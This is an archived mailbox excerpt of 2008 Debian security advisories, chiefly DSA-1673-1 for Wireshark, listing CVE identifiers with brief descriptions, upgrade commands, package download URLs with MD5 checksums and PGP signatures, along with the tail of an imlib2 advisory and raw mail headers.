If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz
    Size/MD5 checksum:   617750 7f389463afdb09310fa61e5036714bb3
  http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.3.0.0debian1-4+etch2.dsc
    Size/MD5 checksum:      775 3a483642e5e60fd6f912af749817f456
  http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.3.0.0debian1-4+etch2.diff.gz
    Size/MD5 checksum:    12968 5394cd31ea21566fef7a6782ff2548a5

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_alpha.deb
    Size/MD5 checksum:   437474 56f6242321a6cef8d4056334b59f54db
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_alpha.deb
    Size/MD5 checksum:   240248 bddc58ba8ad890c50d7cdb1dd827898b

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_amd64.deb
    Size/MD5 checksum:   360324 28957ea6f1202e702daa04f66a13e66b
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_amd64.deb
    Size/MD5 checksum:   212104 acff68d323a86eb0a09d8a34fa607c4f

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_hppa.deb
    Size/MD5 checksum:   386144 1439604854f5dcf30bcc73abf58a9412
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_hppa.deb
    Size/MD5 checksum:   227728 7c1ffa030aad3ee783378f20da6b76f3

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_i386.deb
    Size/MD5 checksum:   335616 729f2498ddf0a28d69344b039aa7bf41
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_i386.deb
    Size/MD5 checksum:   205896 e0d9f18bd5c2e3cfdcc27be6b6b2dfed

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_ia64.deb
    Size/MD5 checksum:   295004 79fd04a7fd23309b68a1e9cb01bc53b4
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_ia64.deb
    Size/MD5 checksum:   462724 ece752dbd71f36cab1acc3bcf6323cd5

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_mips.deb
    Size/MD5 checksum:   207294 9a5e59530d7d8cd78eaba0a2fe5f5b03
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_mips.deb
    Size/MD5 checksum:   370468 732ba92fef6b086a385dae15d39ae3b0

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_mipsel.deb
    Size/MD5 checksum:   207960 00d25bb5fe67159ef4a3853a8448dbf8
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_mipsel.deb
    Size/MD5 checksum:   369292 88cf205cd158e623fded50f65a4be8a0

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_powerpc.deb
    Size/MD5 checksum:   218918 a77ca2842bae4cc9a810121eb5975825
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_powerpc.deb
    Size/MD5 checksum:   359876 239b8ca33d380a7f4f9deed47728f50f

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_s390.deb
    Size/MD5 checksum:   216192 63f335de53e2ca897eab47c487e0cd4b
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_s390.deb
    Size/MD5 checksum:   369042 fee16daa277b04eb95df2c73039e637e

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.3.0.0debian1-4+etch2_sparc.deb
    Size/MD5 checksum:   197844 285364fb7d88c0be4bf7a63358e29a9f
  http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4+etch2_sparc.deb
    Size/MD5 checksum:   336396 cb7f957c2f8442d6ac0b48c07c98df89


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkwp/sACgkQXm3vHE4uylpSgwCggdwfO69JQLeLup1e/MwG40cq
DJEAoM/b8beWpB1/UsgvjrewGIBwHh9w
=4QSv
-----END PGP SIGNATURE-----

From - Mon Dec  1 10:55:19 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bc9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38779-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id A7C4EEC10C
for <lists@securityspace.com>; Mon,  1 Dec 2008 10:53:54 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 728CF237061; Mon,  1 Dec 2008 08:36:00 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12012 invoked from network); 29 Nov 2008 22:52:28 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: using cached result; rate: -6.1
Date: Sun, 30 Nov 2008 00:07:40 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20081129230740.GA6795@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 212.202.236.178
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1673-1] New wireshark packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <8eMYchc8y5N.A.pBF.NtcMJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sat, 29 Nov 2008 23:07:57 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1673-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 29, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-3137 CVE-2008-3138 CVE-2008-3141 CVE-2008-3145 CVE-2008-3933 CVE-2008-4683 CVE-2008-4684 CVE-2008-4685

Several remote vulnerabilities have been discovered network traffic
analyzer Wireshark. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2008-3137

    The GSM SMS dissector is vulnerable to denial of service.

CVE-2008-3138

    The PANA and KISMET dissectors are vulnerable to denial of service.

CVE-2008-3141

    The RMI dissector could disclose system memory.

CVE-2008-3145

    The packet reassembling module is vulnerable to denial of service.

CVE-2008-3933

    The zlib uncompression module is vulnerable to denial of service.

CVE-2008-4683

    The Bluetooth ACL dissector is vulnerable to denial of service.

CVE-2008-4684

    The PRP and MATE dissectors are vulnerable to denial of service.

CVE-2008-4685

    The Q931 dissector is vulnerable to denial of service.

For the stable distribution (etch), these problems have been fixed in
version 0.99.4-5.etch.3.

For the upcoming stable distribution (lenny), these problems have been
fixed in version 1.0.2-3+lenny2.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your wireshark packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4.orig.tar.gz
    Size/MD5 checksum: 13306790 2556a31d0d770dd1990bd67b98bd2f9b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3.dsc
    Size/MD5 checksum:     1066 ece7cc5dd8e70c0b5c13bfbf6e8c6eee
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3.diff.gz
    Size/MD5 checksum:    48388 2918d72a79fafde4759afe72db727d6f

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:    22872 2ac3fe313364295340483294f1e9fb91
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:    22504 e67991e3aa09ce8bd8a44833fe7e3883
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:  9318436 d88e91f579849725048a4f5d9155871d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:   181432 bd619bdb6fdc69e10dd31241268fac22
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:    22498 b6e13d7c505bceb09cd278c5f07c7c40
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:   674820 b6a532ff5292b77773e1aa4cfc2fd577
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:    22510 eafc125f4a6f9084880fdd2a557b9814
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_alpha.deb
    Size/MD5 checksum:   117502 d829953f80e3402ea53f96b5a60010a4

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:   181784 be30e7ac952ecec26ed7cf9d73cf07ca
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:   619708 b97e43ebf7fb339df7210c0fed2de92b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:    22502 24d2101cd90f05f7206ed1b222cf2655
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:  9119506 67bc221048a9a1909e0780547e267956
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:   112146 24dad3e9789181bc32c555174ebc6331
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:    22516 fd918d886d3f43e85efc336267f8d3b1
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:    22504 e427825910c10ca825d6263d72f3231d
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_amd64.deb
    Size/MD5 checksum:    22862 8b219977905e0ca92c11669b819a4d62

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:  7739012 2393f419581304f9d1bc96b2e80a87b9
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:    22520 91159635ccf35f1d0fc51d80eb5af43d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:   600564 6c9dc2dfc018156969644378f856521a
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:    22870 64f1146af6c9759d7fce864dc5f0d7d3
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:    22528 44b24f50cf31c9c8e734fbf5cb32603f
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:    22514 073d8b3cf84d186a28f1923b77825651
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:   182074 21f420a957afb36f416b743ea928344c
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_arm.deb
    Size/MD5 checksum:   107352 a57d347239ea877d9dc7944f025a357f

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:    22872 2ccd34d4f66efe4103e8bd6abefa9522
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:    22512 5969e22027936a31221f293be3ee9a07
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:    22506 c624bb7b41ceb11e497c09c231388f17
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:  9856512 1dc01e880f2cbc9ed221775bada95006
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:   109670 d4eea1ac706ac762a8ed8327438f4642
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:    22504 a738cb866d71bd90d6221655993db604
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:   634968 a399926534b08d75dc0858bebd83c9b5
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_hppa.deb
    Size/MD5 checksum:   182054 cef379511143780007c649c3089ea1b2

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:   182668 a1c8033946069020bf3c985ac15f3262
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:   564704 810e62b84fec47703eb3a123059b576b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:    22492 e0730ad8b28f63b46e57dda4577009f2
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:  7502356 84707ff563a36e6dbdcafb47657b4260
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:    22860 34cc7a26d0416a35b9cbcd5dce2f875c
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:   102308 882325dfde6476fa6fef27435af1c9c7
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:    22498 a03f9bc9d8ce5f23bbab2280ab49798b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_i386.deb
    Size/MD5 checksum:    22504 f2b77a28c0675c396652fcdc9c2c3803

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:    22846 3c2f1b3206af0c51ad92aef628d1296c
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:   145732 4f709746e604fd49e8500000c0c8b9fd
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:    22498 00c321e1542af1331ca18b0df70eee08
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum: 10652434 5884462db3ab99cd180970b81bab92e1
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:    22484 4591898f96b98e28d183328a0e21dba4
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:   827582 c67bd7ddb1ab16764b7ebebbd5b1bb7c
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:    22498 45334f3ef44ae17bb9c8d4a95f6cf4e6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_ia64.deb
    Size/MD5 checksum:   182626 67cd7391e4c59b412ddc2e76c6fa6791

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:   104812 d3f86fe05592a3ac315047246c4dd26e
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:  8017676 583e585fb11a943ef5c0288016dffb43
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:   588850 2ea0a20be951ff4e8ab6ba6525dea911
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:    21856 8ad7420ab94abbaedd0a0283530f9bad
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:    22108 74e578c0a220a579e57830fe8031cc8b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:    21844 7821c6a42d28f2c2833cf58b9ca033a5
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:   181530 cbdd1d6dd954ee7f1d7050ef3c9eba91
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_mips.deb
    Size/MD5 checksum:    21850 42ed2c8bc444299b2f6e4987e79ab666

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:   104602 79217e35d38b7a65b76c40f4e3cb9be1
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:    22492 f3005b052212919cdb4fcdb9b4fba65e
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:  7408744 4228174f1af0bf0b17f4d30de7cf7ea5
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:    22506 9b8bca5a067957146d32d0b92bb09117
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:    22506 250f509a57cee02c619151b65e6fd18e
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:   575840 750acb173d59b7936388b2a0d82dc796
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:   182672 766ee8b1ff019b03703ee93ebb76717f
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_mipsel.deb
    Size/MD5 checksum:    22856 9c5861628a2de7fd905f1924c0474332

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:   182652 1dfdaa74d72de475b67c3256bf14b637
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:    22498 4ec636076c7587204842382f6729001d
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:    22850 cb065d5901a738e96c35dc534407d59e
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:    22504 2da403f29c784c2da2b65d34a4342517
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:   104242 fd8bac6c5986e895547a8cd2bd0e047a
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:  8606102 2f48dcbf4864fff90668b9c9fd0b1f65
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:   583590 c2d40168eec70056745aacac50a1b6cd
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_powerpc.deb
    Size/MD5 checksum:    22490 452169dd566fa6bbf2d2ca1c2d950a37

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:    22848 02756b25f5eb8866a1c8281f088aba85
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:    22504 11c3d2072753d2f3a100e44c3d3fe33a
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:   115600 049e7e0f056196df2500e03c4d32a300
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:  9756694 e39b358505fa9cb7c7a8d0d6d898fd79
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:    22498 39c467d08525f96ce4900c9a26643477
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:    22488 23d2f294343796f2a7d44c3b5d93651e
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:   640960 539d3faeb8bebf6f945803a88f48f927
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_s390.deb
    Size/MD5 checksum:   182622 e0e7919335705d8062378606615675b7

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:    22520 fcded97d018614d9c009b7381af86c0c
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:    22508 08b5ee4324e7bf9c70e3dc64790c0b3a
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:   104122 5389c35fe323621a57e570eae09efa84
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:   586906 d32db40176c7a72e691d1015c1c399dc
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:   183182 db42ff4d1f6cb72b3fed705d72cd9334
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:    22866 880b204b5182202328541153989cf082
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:    22522 acf3820b48c050b01da592940dee07ad
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.3_sparc.deb
    Size/MD5 checksum:  8679242 716f14e3d3ea4795e742fed07ebe2f44

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkxyrUACgkQXm3vHE4uylq7vwCfXYYzKUBFO8sfVaDze9OVW/c0
Z1MAn2KEsLbFlgzyFve4pH6iqq3RDf+X
=7vWq
-----END PGP SIGNATURE-----

From - Mon Dec  1 11:05:17 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bca
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38780-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F24FBEC0F4
for <lists@securityspace.com>; Mon,  1 Dec 2008 11:00:35 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0CB4C2370CC; Mon,  1 Dec 2008 08:36:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25378 invoked from network); 30 Nov 2008 08:18:06 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Sun, 30 Nov 2008 09:33:23 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20081130083323.GA4193@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 212.202.236.178
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.78 tagged_above=3.6 required=5.3
